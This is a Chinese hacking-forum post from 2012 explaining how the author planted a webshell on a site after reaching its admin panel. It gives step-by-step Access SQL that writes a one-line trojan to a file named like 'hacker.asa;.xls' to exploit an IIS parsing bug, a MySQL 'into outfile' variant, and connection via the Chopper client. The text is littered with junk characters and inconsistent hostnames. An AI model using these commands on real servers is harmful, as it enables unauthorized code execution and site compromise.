好不容易进了后台,发现啥上传啊。备份啊多木有。- i9 c7 f2 N- T G8 N6 }1 f
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的* T q5 C' r) z% [0 y" K% F2 l( |$ d
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
7 d: p0 O( D: r$ B1 z* z3 P然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:& F: j& L- h! {* [, g9 f" A
1.create table cmd (a varchar(50))& E w! x4 K0 z- V' ?1 g. [
2.insert into cmd (a) values (‘‘): @7 N% N, v \0 n: Y4 ~
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
! t" C6 ? ]! s2 x' J# p(把表cmd的内容导出为物理路径的一个EXCEL文件)$ K- `0 ~. u/ Z
4.drop table cmd
- J3 E5 @1 P$ q9 ^6 X( D; @( z5 @1 P利用IIS的BUG成功拿到了WEBSHELL。
F# K/ Y U& |6 u
9 e1 I& j9 U g |& Q0 w直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
' \5 ~/ K5 o+ z5 s- ?9 l- V& y6 f9 L4 P5 ?* F* A: @/ |
SQL语句意思解释:% B4 m7 |* U9 o7 R3 ^5 T7 t
第一句
8 b. p" j: Y- g2 e 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为508 V$ Y$ G) U! [; O5 t
5 ]8 f. d( f% T7 ~( I1 L/ K 第二句5 q: w( l' N: Z# c: x+ ?
在表cmd的a字段插入一句话木马) Z5 K0 s1 V. S+ L* {) c$ _$ h' i
第三句
" P0 w2 `( K) p 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件2 Q; B; z8 C+ K
4 Y0 g0 y7 l- `1 ]. ^; a7 S 第四句
2 P6 o; m4 X/ t+ Y; b 删除建立的cmd表4 L! z- G4 w) C" _
* N5 a1 R G& I, P
以下内容为测试:
4 r, q3 m9 ?! e6 ?9 t4 _ Access利用后台SQL执行命令功能导出WebShell:6 F. h. `8 Z6 X1 [/ r* J* @
这个更简单:, [+ c; T+ s0 \+ R! w4 L
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
/ e& m1 t8 n) t# p; K( E 或者
0 t; f7 }5 m0 l0 y$ T X! r# c [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
, A3 u9 M t2 O0 S0 V b, [, ?# B" q5 y3 W# g+ ^
后台有执行SQL语句功能(vote为已知表段)
* T/ L/ C$ ]6 L3 G) e 希望对大家有所帮助拿shell的又一个思路
% s7 a) T( a U2 k% G% s |
发表于 2012-9-13 17:53:58
收藏
分享
支持
反对